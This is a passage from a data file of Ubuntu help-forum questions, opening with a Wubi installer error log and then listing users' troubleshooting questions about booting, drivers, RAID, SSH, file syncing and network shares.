debug windowsbackend : total_memory_mb=4095.99999905 12-20 20:20 debug commonbackend : searching isos on usb devices 12-20 20:20 debug commonbackend : searching for local cds 12-20 20:20 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl7c79.tmp is a valid ubuntu cd 12-20 20:20 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl7c79.tmp\casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl7c79.tmp is a valid ubuntu cd 12-20 20:20 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl7c79.tmp\casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl7c79.tmp is a valid kubuntu cd 12-20 20:20 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl7c79.tmp\casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl7c79.tmp is a valid kubuntu cd 12-20 20:20 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl7c79.tmp\casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl7c79.tmp is a valid xubuntu cd 12-20 20:20 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl7c79.tmp\casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl7c79.tmp is a valid xubuntu cd 12-20 20:20 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl7c79.tmp\casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl7c79.tmp is a valid mythbuntu cd 12-20 20:20 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl7c79.tmp\casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl7c79.tmp is a valid mythbuntu cd 12-20 20:20 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl7c79.tmp\casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl7c79.tmp is a valid edubuntu cd 12-20 20:20 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl7c79.tmp\casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl7c79.tmp is a valid edubuntu cd 12-20 20:20 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl7c79.tmp\casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl7c79.tmp is a valid lubuntu cd 12-20 20:20 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl7c79.tmp\casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl7c79.tmp is a valid lubuntu cd 12-20 20:20 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl7c79.tmp\casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether d : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether d : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether d : \ is a valid kubuntu cd 12-20 20:20 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether d : \ is a valid kubuntu cd 12-20 20:20 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether d : \ is a valid xubuntu cd 12-20 20:20 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether d : \ is a valid xubuntu cd 12-20 20:20 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether d : \ is a valid mythbuntu cd 12-20 20:20 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether d : \ is a valid mythbuntu cd 12-20 20:20 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether d : \ is a valid edubuntu cd 12-20 20:20 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether d : \ is a valid edubuntu cd 12-20 20:20 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether d : \ is a valid lubuntu cd 12-20 20:20 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether d : \ is a valid lubuntu cd 12-20 20:20 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether e : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether e : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether e : \ is a valid kubuntu cd 12-20 20:20 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether e : \ is a valid kubuntu cd 12-20 20:20 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether e : \ is a valid xubuntu cd 12-20 20:20 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether e : \ is a valid xubuntu cd 12-20 20:20 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether e : \ is a valid mythbuntu cd 12-20 20:20 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether e : \ is a valid mythbuntu cd 12-20 20:20 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether e : \ is a valid edubuntu cd 12-20 20:20 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether e : \ is a valid edubuntu cd 12-20 20:20 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether e : \ is a valid lubuntu cd 12-20 20:20 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether e : \ is a valid lubuntu cd 12-20 20:20 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether f : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether f : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether f : \ is a valid kubuntu cd 12-20 20:20 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether f : \ is a valid kubuntu cd 12-20 20:20 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether f : \ is a valid xubuntu cd 12-20 20:20 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether f : \ is a valid xubuntu cd 12-20 20:20 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether f : \ is a valid mythbuntu cd 12-20 20:20 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether f : \ is a valid mythbuntu cd 12-20 20:20 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether f : \ is a valid edubuntu cd 12-20 20:20 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether f : \ is a valid edubuntu cd 12-20 20:20 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether f : \ is a valid lubuntu cd 12-20 20:20 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether f : \ is a valid lubuntu cd 12-20 20:20 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether g : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether g : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether g : \ is a valid kubuntu cd 12-20 20:20 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether g : \ is a valid kubuntu cd 12-20 20:20 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether g : \ is a valid xubuntu cd 12-20 20:20 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether g : \ is a valid xubuntu cd 12-20 20:20 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether g : \ is a valid mythbuntu cd 12-20 20:20 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether g : \ is a valid mythbuntu cd 12-20 20:20 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether g : \ is a valid edubuntu cd 12-20 20:20 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether g : \ is a valid edubuntu cd 12-20 20:20 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether g : \ is a valid lubuntu cd 12-20 20:20 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether g : \ is a valid lubuntu cd 12-20 20:20 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether h : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether h : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether h : \ is a valid kubuntu cd 12-20 20:20 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether h : \ is a valid kubuntu cd 12-20 20:20 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether h : \ is a valid xubuntu cd 12-20 20:20 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether h : \ is a valid xubuntu cd 12-20 20:20 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether h : \ is a valid mythbuntu cd 12-20 20:20 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether h : \ is a valid mythbuntu cd 12-20 20:20 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether h : \ is a valid edubuntu cd 12-20 20:20 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether h : \ is a valid edubuntu cd 12-20 20:20 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether h : \ is a valid lubuntu cd 12-20 20:20 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether h : \ is a valid lubuntu cd 12-20 20:20 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:20 info root : running the installer ... 12-20 20:20 debug windowsfrontend : __init__ ... 12-20 20:20 debug windowsfrontend : on_init ... 12-20 20:20 info winuipage : appname=wubi , localedir=c : \users\peter\appdata\local\temp\pyl7c79.tmp\translations , languages= [ 'en_us ' , 'en ' ] 12-20 20:20 info winuipage : appname=wubi , localedir=c : \users\peter\appdata\local\temp\pyl7c79.tmp\translations , languages= [ 'en_us ' , 'en ' ] 12-20 20:20 debug winuiinstallationpage : target_drive=c : , installation_size=18000mb , distro_name=ubuntu , language=en_us , locale=en_us.utf-8 , username=peter 12-20 20:20 info root : received settings 12-20 20:20 debug commonbackend : searching for local cd 12-20 20:20 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl7c79.tmp is a valid ubuntu cd 12-20 20:20 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl7c79.tmp\casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether d : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether e : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether f : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether g : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:20 debug distro : checking whether h : \ is a valid ubuntu cd 12-20 20:20 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:20 debug commonbackend : searching for local iso 12-20 20:20 info winuipage : appname=wubi , localedir=c : \users\peter\appdata\local\temp\pyl7c79.tmp\translations , languages= [ 'en_us ' , 'en ' ] 12-20 20:20 debug tasklist : # running tasklist ... 12-20 20:20 debug tasklist : # # running select_target_dir ... 12-20 20:20 error tasklist : can not install into c : \ubuntu . there is another file or directory with this name . please remove it before continuing . traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 81 , in select_target_dir exception : can not install into c : \ubuntu . there is another file or directory with this name . please remove it before continuing . 12-20 20:20 debug tasklist : # cancelling tasklist 12-20 20:20 debug tasklist : # finished tasklist 12-20 20:20 error root : can not install into c : \ubuntu . there is another file or directory with this name . please remove it before continuing . traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 81 , in select_target_dir exception : can not install into c : \ubuntu . there is another file or directory with this name . please remove it before continuing . please help me
231230	how do i get design input on a paper cut ?	i 'm working designing a fix for a paper cut , and i 'd like to get someone to approve it before i try to implement it . how should i go about doing this ?
231233	ubuntu 12.10 password do n't works after login	during a complete fresh installation i choosed a case sensitive password with an `` ! '' inside the string , it works fine for the normal login , but when i try to use sudo or su or passwd or some gui stuff which requires a password i get an authentication error . i really have no idea what to do , i tried to enter the password in an editor to check numlock , etc ... no problem . after the login i get an error ( ca . 1 minute after login ) , in german : '' es wurde ein problem mit einer systemanwendung festgestellt '' something like : '' there is a problem with a system process/program ''
231237	was my ubuntu installation successful ?	i am a new user of ubuntu . i follow all the instructions to install it . it seemed to be successful . and i had saved some files in it . somehow , i do n't really see the grub menu when i start ubuntu again . still , it shows me the menu of installation/try/defaults . when i choose default ( since i 've installed ) , it enters like normal , but the files that i 'd saved earlier are missing . everything is like `` newly-installed '' , everything is just new . does anyone know what happen ?
231239	usb boot not working on oaktrail tablet	i have oaktrail flatform tablet . ( atom processor ) i tried to boot by usb . using syslinux and unetbootin . but , syslinux stop working at copyright message . and unetbootin only black screen . this problem is occurred all linux distribution . however , windows boot usb is very well . how can i do ?
231241	segmentation fault while using primus	i have been trying to use primus for a while , but i could n't manage to get it work . i have followed these instructions ; http : //www.webupd8.org/2012/11/primus-better-performance-and-less.html optirun is working pretty nice , however if i try to run primus it fails with a segfault . 04:10 ~ $ primusrun glxspheres segmentation fault ( core dumped ) i 'm not sure how can i debug this , and why this is happening . syslog is not helpful either dec 21 04:53:47 n56-laptop kernel : [ 3581.385043 ] glxspheres [ 7889 ] : segfault at 0 ip ( null ) sp 00007fffda4604a8 error 14 in glxspheres [ 400000+7000 ] i 'm running ubuntu 12.10 - 64bit . thanks for any advice/help on this .
231243	what are the different ways i can contribute to the one hundred paper cuts project ?	i want to get involved with the one hundred paper cuts project , but i do n't know what there is to do . i 'm not a programmer so i 'm not sure if i can even contribute anything . can someone please explain what there is to do on the one hundred paper cuts project ?
231245	how to make a window seen in only one viewport ?	i have 2 viewports on ubuntu . if i drag a window in viewport # 1 just a bit to the right ( until a bit of its right part is out of the viewport ) , it starts to appear in viewport # 2 . is there any way to disable this behaviour ? that is , i want to assign each window to a specific viewport , and i do n't want them to be seen in any other viewports .
231246	which version of ubuntu to download to use in parallels on mac os x	which version of ubuntu do i need to download to create a vm in parallels on my mac ? 32 bit vs 64 bit ? i386 vs amd version ?
231255	erasing my hdd and starting over	ok. all i want to do i erase my entire hdd including ubuntu 12.04 . i just bought win7 , and i want to erase everything so i can boot that up . i have no important files , i just want it gone . i am having trouble doing that . i get access denied everytime i try to clear my hdd . help please .
231259	lsyncd - sync immediately when source is shared folder	i have a ubuntu 12.10 guest that is running in vmware workstation on a windows 7 host . i have created a shared folder so that ubuntu can see a folder that lives on my windows 7 host . i then set it up so that every time ubuntu boots , the shared folder will be mounted under /files . so far , everything works well . however , i created a second folder called /files2 and wish to use lsyncd to sync /files to /files2 . lsyncd was installed using sudo apt-get install lsyncd . after installation , i created /etc/lsyncd/lsyncd.conf.lua . this is my configuration file ( etc/lsyncd/lsyncd.conf.lua ) sync { default.rsync , source = `` /www '' , target = `` /www2 '' , rsyncopts = `` -ltuspogx '' , delay=0 } the problem is that the sync never seems to happen , that is even if i restart or start/stop lsyncd . finally , if i ever create a file in the shared folder on the host machine ( windows 7 ) , i can see it in /files , but it never gets synced to /files2 . i need to get lsyncd to sync when i create/modify/delete folders in /files in my ubuntu guest or windows . is there anything in my configuration that i have missed to cause the sync to not work ?
231262	ssh need password but i have generated rsa key	i have generated rsa key and add it to server 's ~/.ssh/authored_keys . why i nedd password when i ssh server ? my local name is a and server name is b ( a root user ) .do i need create a user named a ?
231267	new computer , same raid . mdadm wo n't assemble	ubuntu 12.04 64 . hardware failure ( motherboard ) led me to build a new machine , and i took the opportunity to do a fresh install of ubuntu ( first one was a learning experience ) . i moved the raid disks over and am seeing them in disk utility as /dev/sdb and /dev/sdc with their volumes listed as `` raid component '' . however , when i try to mount them like so sudo mdadm -- assemble /dev/md0 /dev/sdb /dev/sdc i get this error mdadm : can not assemble mbr metadata on /dev/sdb mdadm : /dev/sdb has no superblock - assembly aborted any ideas ?
231268	grub2 error : unknown filesystem from reinstall	( sorry if some of this info is irrelevant , not sure if how much of this will matter or not ) so i was reinstalling ubuntu 12.10 with the same usb i had used to install it the first time ( dual boot with win7 ) . i initially had a grub error booting into windows ( but not ubuntu ) , but i could still boot into windows by switching to the windows bootloader in the bios . so i ran boot repair in ubuntu and everything was fine . however there were some sound issues , i tinkered with alsa and ended up breaking it more , so i decided to reinstall . when i booted from the usb , i got the option to remove the existing ubuntu and reinstall ( which i figured would leave windows alone , since there were other options for that and this option specifically mentioned only ubuntu files ) . now , when i try booting from anything besides the usb , i get the grub2 error : unknown filesystem and it goes straight to the recovery command line . if i could just get windows to boot i could wipe everything besides windows and start over from there , but the windows bootloader now goes straight to grub , where before it still at least booted just windows . my problem is all i can do ( besides the grub2 reovery command line ) is off the live usb , so i do n't think i can install anything ( like boot repair ) and i ca n't view my actual hard drive partitions from the ubuntu terminal , as it just lists the usb . i have no clue what to do from here , short of a total wipe of the hdd when installing ubuntu , which will only be a last resort for me .
231270	wireless activation key fn12 does not respond in hp notebook pavilion g4 2210la	when i press fn12 this sign appers and nothig happens . how do i make fn key work properly ?
231273	list of folders being synchronised on ubuntu one	i think ubuntu one is syncing my backup folder ( deja-dup ) . i 'm concerned this could be a problem should a file become corrupted , and i need to retrieve it . is there some way i can see a list of synced folders and turn off ones i do not want ? thanks !
231279	installing xerox phaser 3300 from cd - do not have permissions	i am looking to configure my scanner , xerox phaser 3300mfp for use on ubuntu 12.10 . i am already able to print , but would like to use scanning to computer capability . i tried installing the software for my phaser 3300 from the cd within xerox_mfp\linux\install.sh and by selecting `` open auto run prompt '' and i receive `` you are not authorized to install the driver package . only user with root privileges is allowed to do this . installation can not be completed now . i then installed it using the sudo command , but now when trying to select the configuration utility on my desktop called `` xerox unified driver configuator '' i receive `` there was an error launching the application . details : failed to execute child process `` /opt/xerox/mfp/bin/configurator '' ( permission denied ) i would like to get this scanner configured for use , but just not sure how to do so . please advise . do i need to launch this configuator using the sudo command ? if so , i am not sure how to do that . please keep in mind i am new to linux . as much as i hate to admit , i was raised on ms-dos and windows , even though they are really the same thing . : )
231280	no audio outputs showing up , audio output is working	i 'm running ubuntu 12.04 lts on an hp g60-458dx . when i installed ubuntu , all my audio outputs ( hdmi , analog , digital , etc . ) would show up under sound settings . however , recently , all these have disappeared . because of this , ubuntu wo n't let me control output volume . however , applications can and do still play audio through the built-in pc speakers , and their volume controls still work . this happened around the same time i first installed pulse audio equalizer and first plugged my laptop into an external hdmi monitor/speaker system . at that time , all audio features worked as intended . ever since then , i 've had these listed problems and audio no longer plays out hdmi ; instead it still plays from the pc speakers . i can control the sound on the login screen , but not once i log in . why wo n't my audio outputs appear in sound settings , but my pc speakers still work ? more importantly , how do i fix this ?
231283	ubuntu 12.04 64bit android source code download problem	i am having amd athlon machine with os ubuntu 12.04 ( 64bit os ) installed on it . i need to download source code for android for which i need to follow number of steps as shown in the link . http : //source.android.com/source/initializing.html while following this i need to run the command as sudo apt-get install git-core gnupg flex bison gperf build-essential \ zip curl libc6-dev libncurses5-dev : i386 x11proto-core-dev \ libx11-dev : i386 libreadline6-dev : i386 libgl1-mesa-glx : i386 \ libgl1-mesa-dev g++-multilib mingw32 openjdk-6-jdk tofrodos \ python-markdown libxml2-utils xsltproc zlib1g-dev : i386 so at a single go this command fails somehow . so i had breaked it down and tried to install . still i am facing problem when i run the following command : sudo apt-get install build-essential libc6-dev libncurses5-dev : i386 libreadline6-dev : i386 g++-multilib zlib1g-dev : i386 libxext-dev : i386 the log that get printed in the terminal is as below : > reading package lists ... done building dependency tree reading state information ... done package build-essential is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libc6-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : linux-libc-dev : i386 libc-dev-bin package libncurses5-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libtinfo-dev e : package 'build-essential ' has no installation candidate e : package 'libc6-dev ' has no installation candidate e : package 'libncurses5-dev ' has no installation candidate e : unable to locate package g++-multilib e : could n't find any package by regex 'g++-multilib' e : unable to locate package zlib1g-dev please help on . how i get this solved ?
231289	how to tell which graphics card is being used in a hybrid system ?	how do i know which graphics card is being used in a hybrid system ? from lspci : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) subsystem : dell device [ 1028:0578 ] kernel driver in use : i915 kernel modules : i915 -- 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gk107 [ geforce gt 650m ] [ 10de:0fd1 ] ( rev a1 ) subsystem : dell device [ 1028:0578 ] kernel driver in use : nouveau kernel modules : nouveau , nvidiafb from xorg.0.log : [ 46.292 ] ( ii ) intel ( 0 ) : output vga1 has no monitor section [ 46.340 ] ( ii ) intel ( 0 ) : edid for output vga1 [ 46.388 ] ( ii ) intel ( 0 ) : output vga1 disconnected [ 46.541 ] ( ii ) nouveau ( g0 ) : output vga-2 has no monitor section [ 46.563 ] ( ii ) nouveau ( g0 ) : edid for output vga-2 [ 46.563 ] ( ii ) nouveau ( g0 ) : output vga-2 disconnected [ 46.563 ] ( ii ) nouveau ( g0 ) : output vga-2 disconnected full xorg.0.log : http : //paste.ubuntu.com/1454118/
231290	ubuntu 12.10 gnome shell stuck in fall back mode - acer 5830tg notebook	one of my friends is using ubuntu 12.10 unity for some time . and finally he decided to try gnome shell . hence he installed gnome shell and now while logging into gnome shell ( from login screen ) this weird thing occurs . its falling back to old gnome . tried restarting the laptop but still didnt work . he has nvidia gforce gt 540m graphic card . didnt install any proprietary drivers . tried disabling the graphic card in bios as well . please help . thanks .
231292	installed ubuntu using lvm , now can not boot windows	just installed ubuntu using the lvm method . i shrunk my main drive into a separate partition of ~30gb thinking i could install it there . however when i was installing , i could n't find that partition so i just used the lvm method that came with the installer . ubuntu loaded up fine , and updated itself , but then when i restarted it went straight to ubuntu . i loaded up my windows cd to try and repair the bcd , but it could not find any windows installations , and then when grub loaded up my windows installation was not listed . what happened , and is it possible to fix it ?
231293	need to show year in menubar	i need to take a screen shot in ubuntu 12.10 with the whole time stamp including the year in it . is there any way to do this ? clicking the time opens the calendar , with year , but i can not take the screen shot while the calendar is dropped down . please help me .
231296	java application appears in other unity workspace	so to clarify a few facts first : with `` unity workspace '' i mean the workspaces in ubuntu which i switch to using ctrl+alt+arrows . i do not mean the eclipse workspaces i use openjdk java 7 i have myunity and compizconfig settingsmanager installed , and i use 9 ( 3x3 ) workspaces . the issue : i use eclipse to create a program for school . each time i launch the program from eclipse , or just from command line with an exported jar , the application opens in the workspace right to the one i 'm working in . if i use the most right workspace , it 'll just pop up in the first one . anyone knows why this happens and how to fix it ? regards , brent
231301	client login before accessing the internet	i wanted to create an internet gateway server where the client connecting to my network must enter a username and password , where the server checks if username and password is correct before they can access the internet . more like authentication via web browser . setup is like this : internet < -- > gateway server < -- > wifi router < -- > ( clients connected ) add : - > when not authenticated , the client will be redirected to the local server login page . when authenticated , client can access internet . - > if user deletes cookies , user will be redirected to the local server login page until authenticated again . i do n't know if it is related , but it is like this , but with client login : http : //ubuntuforums.org/showthread.php ? t=926001
231305	can not connect to windows share using computer name	i have ubuntu 12.10 installed in vmware workstation as a guest . the vm 's network adapter is set up as `` bridge '' , so effectively , it should look like it is connected directly to the switch all my computers are connected to . i am trying to make the vm connect to shares on the host . the host has a computer name of mycomp and workgroup of workgroup . the host is running windows 7 64-bit . in nautilus , i choose file > connect to server . i then set it to windows share and try to connect to my computer . if i set mycomp as the server name , the connection will fail with failed to retrieve share list from server . if i set it to the ip address 192.168.1.7 , then it works . i have done a bit of research and discovered that maybe it is because i do n't have nmbd installed on the system . however , i believe it is part of the samba packages , which i do have : user @ ubuntu : ~ $ sudo apt-get install samba-common-bin smbclient samba-common reading package lists ... done building dependency tree reading state information ... done samba-common is already the newest version . smbclient is already the newest version . samba-common-bin is already the newest version . is there anyway i can connect to the windows share using the computer name ?
231306	booting multiple oss from multiple disks with uefi	how does booting multiple oss from multiple disks work in terms of uefi ? i have ssd0 on which windows 7 is installed , and ssd1 on which i 'd like to have xubuntu and arch linux . i understand the process when one disk is involved , but have no idea when it comes to multiple disks . thank you .
231307	does every i5 i7 intel processor have intel graphics on board ?	i am asking because i can make a bargain on such a laptop , but it is advertised with amd graphics and afaik driver support for amd is not that great . if so , how would linux react seeing two graphics adaptors ?
231309	my mouse / keyboard response gets delayed if i do n't use it all the time .	occasionally my mouse / keyboard would take extra long to respond to input . if i moved the mouse or pressed a key it would take an extra second to respond the work normally . if i leave it alone for a period of time the it happens again . in the dmesg log i see entries like this dmesg | tail ehci_hcd 0000:00:1d.0 : pci int a disabled ehci_hcd 0000:00:1d.0 : pme # enabled ehci_hcd 0000:00:1d.0 : bar 0 : set to [ mem 0xd9105800-0xd9105bff ] ( pci address [ 0xd9105800-0xd9105bff ] ) ehci_hcd 0000:00:1d.0 : restoring config space at offset 0xf ( was 0x100 , writing 0x10b ) ehci_hcd 0000:00:1d.0 : restoring config space at offset 0x1 ( was 0x2900000 , writing 0x2900002 ) ehci_hcd 0000:00:1d.0 : pme # disabled ehci_hcd 0000:00:1d.0 : pci int a - > gsi 21 ( level , low ) - > irq 21 ehci_hcd 0000:00:1d.0 : setting latency timer to 64 i found out which device it is but still do n't know what is actually causing the issue . i know it has some thing to do with the usb controller . lspci -n | grep 00:1d.0 00:1d.0 0c03 : 8086:3b34 ( rev 05 ) lspci -d 8086:3b34 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) update after a bit of investigation i believe it has some thing to do with power management , power saving or auto suspend of the device .
231316	jetbrains idea not showing up in task switcher	i 'm trying to use jetbrain idea on ubuntu 12.10 . however , it 's not showing in the task switcher ( alt-tab ) , which is very annoying . i think this is because it 's started from a sehll script ( idea.sh ) . the launcher bar to the left does show an icon for it but clicking on it has no effect . how to avoid this ?
231318	not able to connect to mobile broadband	i can connect to internet by modem , when i plug the device before booting.after unplugging and when try to re plug the modem after log in , there is no enable mobile network option and i can not connect to the internet.can anyone help me ? ... .
231320	installing ubuntu 11.10 over 10.04	i tried upgrading ubuntu 9.10 to 10.04.however there were many boot problems and i could n't boot 10.04 successfully . my computer has broken down and not working . 10.04 was the only os installed . i want to overwrite using a live cd and i want to know what are the steps involved in the procedure and the precautions to be taken with it . also i took a device image of my system using clonezilla and would like to know if i can still restore the home partition of 9.10 on 11.10 ?
231321	ca n't install privateergold1.03.bz2.bin	i downloaded a linux friendly game called privateer gemini gold . i have the file in my `` downloads '' folder . first question : when i start my terminal , and i type ls , downloads appear to be in my home directory . do i need to change directory or something first ? second question : i try to install the program , by typing sudo sh downloads/privateergold1.03.bz2.bin . i have tried without the sh command as well , but neither command works . i even tried writing the full path but that did n't work either . it keeps telling me it ca n't open the file . the spelling is correct , i 've tried it about 30 times and i am getting very frustrated . any ideas ?
231323	compiling qemu with spice support	i am trying to compile qemu 1.3 with ubuntu 12.04 with spice enabled , i get this error : error error : user requested feature spice error : configure was not able to find it error i have read around and it seems i should edit pkg config path ? i am running ubuntu , i tried changing pkg config but i am guessing ... help ?
231324	can only boot into recovery mode on asus eee pc 1005pe	i have installed ubuntu 12.04.1 lts on an asus eee pc 1005pe machine . after the first install , i ca n't start the notebook in the normal mode . once selected , the screen turns the color of the login screen background ( could almost be mistaken for black , but slightly purplish-red ) and then ultimately turns black . no response to any key combinations . but if i start in the recovery mode and simply do a normal boot from the list , it loads just fine . any suggestions on troubleshooting this ? i have the latest updates installed from the default repositories .
231325	how to make auto shut down for kiosk ( firefox kiosk ) after no activity 10 min ? ubuntu 12.04	i found ideas for shutting down pc after mouse inactivity , but that 's not working . i made button for shut down , but that 's not working in kiosk mode , and users forget to shut down pc . now pc has auto sleep with use sleepd program .
